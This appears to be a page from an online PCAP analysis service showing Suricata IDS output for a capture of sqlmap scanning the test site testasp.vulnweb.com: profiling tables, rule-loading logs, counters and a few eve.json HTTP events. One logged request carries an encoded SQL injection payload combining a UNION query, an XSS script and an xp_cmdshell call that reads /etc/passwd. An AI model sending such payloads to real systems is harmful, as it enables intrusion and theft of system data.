Filename: sqlmap.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etopen-all
Runtime: 10.7183599472 seconds
Hash: c8027fddb943c33d197316babb1cbf5e
Uploaded: 1542363560

Logfiles


packet_stats.log - (8743 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          1472           446147      349292125     221339100        325.8b  100.00
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          1472            66755       19486087        293776        432.4m   97.41
TMM_RECEIVEPCAPFILE         IPv4       6          1470             2537         160946          4629          6.8m    1.53
TMM_DECODEPCAPFILE          IPv4       6          1470             2661          62597          3200          4.7m    1.06

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          1470             2763         405147          4303          6.3m  1.77  
stream                  IPv4       6          1472             2553         527406         20030         29.5m  8.25  
detect                  IPv4       6          1472            44535       19448572        214976        316.4m  88.53 
tcp-prune               IPv4       6          1472             2519         156155          3518          5.2m  1.45  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6           126             3460          19745          5136        647.2k  100.00
Proto detect            IPv4       6             4             2901          31671         11620         46.5k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_JSON_HTTP            IPv4       6           126            41929       13446751        183870         23.2m  65.67 
LOGGER_JSON_FILE            IPv4       6           125            54596         393947         96910         12.1m  34.33 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           711             2578        6751067         28846        20.5m  22.30 
stream                            IPv4       6           711             2554         576898         29084        20.7m  22.48 
http_uri                          IPv4       6           126             6660          67623         17264         2.2m  2.36  
http_request_line                 IPv4       6           126             3470          54774          5841       736.1k  0.80  
http_client_body                  IPv4       6           126             2709          18760          3251       409.6k  0.45  
http_header (request)             IPv4       6           126            10169         262787         22480         2.8m  3.08  
http_header (request trailer)     IPv4       6           126             2575          19012          3086       388.9k  0.42  
http_header_names (request)       IPv4       6           126             5809          68362         11229         1.4m  1.54  
http_accept (request)             IPv4       6           126             2852           9345          3415       430.3k  0.47  
http_referer (request)            IPv4       6           126             2849          38953          4023       506.9k  0.55  
http_content_len (request)        IPv4       6           126             2859          32941          3541       446.2k  0.49  
http_content_type (request)       IPv4       6           126             2790         464371          6940       874.5k  0.95  
http_start (request)              IPv4       6           126             5428          50877          8679         1.1m  1.19  
http_raw_header (request)         IPv4       6           126             7523          68969         10028         1.3m  1.37  
http_method                       IPv4       6           126             2734          30566          3501       441.2k  0.48  
http_cookie (request)             IPv4       6           126             2852          21219          4251       535.7k  0.58  
http_raw_uri                      IPv4       6           126             3061          21993          5234       659.5k  0.72  
http_user_agent                   IPv4       6           126             4949        5454287         51275         6.5m  7.02  
http_host                         IPv4       6           126             3317          43327          5032       634.1k  0.69  
http_response_line                IPv4       6           125             3221          53745          5237       654.6k  0.71  
http_header (response)            IPv4       6           125             7780          65562         16850         2.1m  2.29  
http_header (response trailer)    IPv4       6           125             2587           4922          2796       349.6k  0.38  
http_content_type (response)      IPv4       6           125             2864          38564          3809       476.1k  0.52  
http_raw_header (response)        IPv4       6           333             3713          66308          6496         2.2m  2.35  
http_cookie (response)            IPv4       6           125             2909          46353          5207       650.9k  0.71  
http_stat_code                    IPv4       6           125             2793           6137          3232       404.1k  0.44  
file_data (http response)         IPv4       6           333             2573        7375454         68125        22.7m  24.66 
Total                             IPv4                  4980                                         18470        92.0m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6           260             3359          70295         19039          5.0m  1.15  
PROF_DETECT_RULES           IPv4       6          1472             2529        8733159         55884         82.3m  19.11 
PROF_DETECT_STATEFUL_START    IPv4       6           573             5096         529203         28144         16.1m  3.75  
PROF_DETECT_STATEFUL_CONT    IPv4       6          1472             2512         402180          5974          8.8m  2.04  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           944             2560          50842          3147          3.0m  0.69  
PROF_DETECT_PREFILTER       IPv4       6          1472             7808       19388813        106204        156.3m  36.31 
PROF_DETECT_PF_PAYLOAD      IPv4       6           711            18983       19343603         93891         66.8m  15.51 
PROF_DETECT_PF_TX           IPv4       6           944             2542        7418802         69467         65.6m  15.23 
PROF_DETECT_PF_SORT1        IPv4       6           517             2540          62939          3563          1.8m  0.43  
PROF_DETECT_PF_SORT2        IPv4       6          1472             2516          59568          3048          4.5m  1.04  
PROF_DETECT_NONMPMLIST      IPv4       6          1472             2523         129726          3473          5.1m  1.19  
PROF_DETECT_ALERT           IPv4       6          1472             2514          44996          3007          4.4m  1.03  
PROF_DETECT_CLEANUP         IPv4       6          1472             2514         394789          3454          5.1m  1.18  
PROF_DETECT_GETSGH          IPv4       6          1472             2527          82915          3921          5.8m  1.34  


suricata-report-2018-11-16-T-10-19-31-11162018.1019-sqlmap.pcap.txt - (18281 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/c8027fddb943c33d197316babb1cbf5ed2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/11162018.1019-sqlmap.pcap -vvv -k none
elapsedtime:9.694385
stderr:
stdout:
16/11/2018 -- 10:19:21 - <Info> - Configuration node 'rule-files' redefined.
16/11/2018 -- 10:19:21 - <Notice> - This is Suricata version 4.0.0 RELEASE
16/11/2018 -- 10:19:21 - <Info> - CPUs/cores online: 1
16/11/2018 -- 10:19:21 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32781 and 'request-body-inspect-window' set to 16380 after randomization.
16/11/2018 -- 10:19:21 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32009 and 'response-body-inspect-window' set to 15720 after randomization.
16/11/2018 -- 10:19:21 - <Config> - DNS request flood protection level: 500
16/11/2018 -- 10:19:21 - <Config> - DNS per flow memcap (state-memcap): 524288
16/11/2018 -- 10:19:21 - <Config> - DNS global memcap: 16777216
16/11/2018 -- 10:19:21 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
16/11/2018 -- 10:19:21 - <Config> - preallocated 1000 hosts of size 136
16/11/2018 -- 10:19:21 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
16/11/2018 -- 10:19:21 - <Config> - using magic-file /usr/share/file/magic
16/11/2018 -- 10:19:21 - <Config> - Core dump size is unlimited.
16/11/2018 -- 10:19:21 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
16/11/2018 -- 10:19:21 - <Config> - preallocated 1000 defrag trackers of size 168
16/11/2018 -- 10:19:21 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
16/11/2018 -- 10:19:21 - <Config> - stream "prealloc-sessions": 2048 (per thread)
16/11/2018 -- 10:19:21 - <Config> - stream "memcap": 33554432
16/11/2018 -- 10:19:21 - <Config> - stream "midstream" session pickups: disabled
16/11/2018 -- 10:19:21 - <Config> - stream "async-oneside": disabled
16/11/2018 -- 10:19:21 - <Config> - stream "checksum-validation": disabled
16/11/2018 -- 10:19:21 - <Config> - stream."inline": disabled
16/11/2018 -- 10:19:21 - <Config> - stream "bypass": disabled
16/11/2018 -- 10:19:21 - <Config> - stream "max-synack-queued": 5
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "memcap": 134217728
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "depth": 0
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "toserver-chunk-size": 2523
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "toclient-chunk-size": 2509
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly.raw: enabled
16/11/2018 -- 10:19:21 - <Config> - stream.reassembly "segment-prealloc": 2048
16/11/2018 -- 10:19:21 - <Config> - Delayed detect disabled
16/11/2018 -- 10:19:21 - <Config> - pattern matchers: MPM: ac, SPM: bm
16/11/2018 -- 10:19:21 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
16/11/2018 -- 10:19:21 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
16/11/2018 -- 10:19:21 - <Config> - prefilter engines: MPM
16/11/2018 -- 10:19:21 - <Config> - IP reputation disabled
16/11/2018 -- 10:19:21 - <Perf> - Registered 148 keyword profiling counters.
16/11/2018 -- 10:19:21 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-ftp.rules
16/11/2018 -- 10:19:21 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-policy.rules
16/11/2018 -- 10:19:21 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-trojan.rules
16/11/2018 -- 10:19:22 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-games.rules
16/11/2018 -- 10:19:22 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-pop3.rules
16/11/2018 -- 10:19:22 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-user_agents.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-activex.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-rpc.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-attack_response.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp.rules
16/11/2018 -- 10:19:23 - <Config> - No rules loaded from ET-emerging-icmp.rules.
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-scan.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-voip.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-chat.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp_info.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-info.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-shellcode.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_client.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-imap.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_server.rules
16/11/2018 -- 10:19:23 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-current_events.rules
16/11/2018 -- 10:19:24 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-inappropriate.rules
16/11/2018 -- 10:19:24 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-smtp.rules
16/11/2018 -- 10:19:24 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_specific_apps.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-deleted.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-malware.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-snmp.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-worm.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dns.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-misc.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-sql.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dos.rules
16/11/2018 -- 10:19:26 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-netbios.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-telnet.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-exploit.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-p2p.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-tftp.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-mobile_malware.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-botcc.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-compromised.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-drop.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-dshield.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-tor.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-ciarmy.rules
16/11/2018 -- 10:19:27 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/local.rules
16/11/2018 -- 10:19:27 - <Config> - No rules loaded from local.rules.
16/11/2018 -- 10:19:27 - <Info> - 44 rule files processed. 18236 rules successfully loaded, 0 rules failed
16/11/2018 -- 10:19:27 - <Info> - Threshold config parsed: 0 rule(s) found
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tcp-packet
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tcp-stream
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for udp-packet
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for other-ip
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_uri
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_request_line
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_client_body
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_response_line
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_header
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_header
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_header_names
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_header_names
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_accept
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_accept_enc
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_accept_lang
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_referer
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_connection
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_content_len
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_content_len
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_content_type
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_content_type
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_protocol
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_protocol
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_start
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_start
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_raw_header
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_raw_header
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_method
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_cookie
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_cookie
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_raw_uri
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_user_agent
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_host
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_raw_host
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_stat_msg
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_stat_code
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for dns_query
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tls_sni
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tls_cert_issuer
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tls_cert_subject
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for tls_cert_serial
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for dce_stub_data
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for dce_stub_data
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for ssh_protocol
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for ssh_protocol
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for ssh_software
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for ssh_software
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for file_data
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for file_data
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_request_line
16/11/2018 -- 10:19:27 - <Perf> - using shared mpm ctx' for http_response_line
16/11/2018 -- 10:19:27 - <Info> - 18241 signatures processed. 1175 are IP-only rules, 6125 are inspecting packet payload, 13172 inspect application layer, 0 are decoder event only
16/11/2018 -- 10:19:27 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
16/11/2018 -- 10:19:27 - <Perf> - TCP toserver: 41 port groups, 40 unique SGH's, 1 copies
16/11/2018 -- 10:19:27 - <Perf> - TCP toclient: 21 port groups, 21 unique SGH's, 0 copies
16/11/2018 -- 10:19:27 - <Perf> - UDP toserver: 41 port groups, 33 unique SGH's, 8 copies
16/11/2018 -- 10:19:27 - <Perf> - UDP toclient: 21 port groups, 15 unique SGH's, 6 copies
16/11/2018 -- 10:19:27 - <Perf> - OTHER toserver: 254 proto groups, 2 unique SGH's, 252 copies
16/11/2018 -- 10:19:27 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
16/11/2018 -- 10:19:28 - <Perf> - Unique rule groups: 111
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toserver TCP packet": 31
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toclient TCP packet": 20
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toserver TCP stream": 31
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toclient TCP stream": 21
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toserver UDP packet": 33
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "toclient UDP packet": 15
16/11/2018 -- 10:19:28 - <Perf> - Builtin MPM "other IP packet": 2
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_uri": 8
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_request_line": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_client_body": 6
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_response_line": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_header": 6
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_header": 3
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_header_names": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_accept": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_referer": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_content_len": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_content_type": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_content_type": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_start": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_method": 3
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_cookie": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_cookie": 2
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_user_agent": 4
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver http_host": 2
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient http_stat_code": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver dns_query": 4
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver tls_sni": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toserver file_data": 1
16/11/2018 -- 10:19:28 - <Perf> - AppLayer MPM "toclient file_data": 5
16/11/2018 -- 10:19:29 - <Perf> - Registered 18241 rule profiling counters.
16/11/2018 -- 10:19:29 - <Info> - fast output device (regular) initialized: alert
16/11/2018 -- 10:19:29 - <Info> - eve-log output device (regular) initialized: eve.json
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'alert'
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'http'
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'dns'
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'tls'
16/11/2018 -- 10:19:29 - <Config> - enabling 'eve-log' module 'files'
16/11/2018 -- 1

This file has been truncated. Go here to download in full.


stats.log - (2404 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
------------------------------------------------------------------------------------
Date: 11/16/2018 -- 10:19:31 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 1470
decoder.bytes                              | Total                     | 846124
decoder.ipv4                               | Total                     | 1470
decoder.sll                                | Total                     | 1470
decoder.tcp                                | Total                     | 1470
decoder.avg_pkt_size                       | Total                     | 575
decoder.max_pkt_size                       | Total                     | 4412
flow.tcp                                   | Total                     | 130
tcp.sessions                               | Total                     | 129
tcp.syn                                    | Total                     | 129
tcp.synack                                 | Total                     | 129
tcp.rst                                    | Total                     | 3
detect.mpm_list                            | Total                     | 2
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 3
app_layer.flow.http                        | Total                     | 125
app_layer.tx.http                          | Total                     | 126
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 116
flow_mgr.flows_notimeout                   | Total                     | 116
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65420
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7111744


eve.json - (166139 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
{"timestamp":"2018-11-16T10:17:48.755530+0000","flow_id":781020899842446,"pcap_cnt":32,"event_type":"http","src_ip":"192.168.5.137","src_port":43750,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:48.778501+0000","flow_id":781020899842446,"pcap_cnt":36,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43750,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":15382},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":15382,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.070640+0000","flow_id":329048606386753,"pcap_cnt":53,"event_type":"http","src_ip":"192.168.5.137","src_port":43752,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1&oVIL=1267%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.093297+0000","flow_id":329048606386753,"pcap_cnt":55,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43752,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1&oVIL=1267%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":16138},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":16138,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.763542+0000","flow_id":1509700756351997,"pcap_cnt":74,"event_type":"http","src_ip":"192.168.5.137","src_port":43754,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
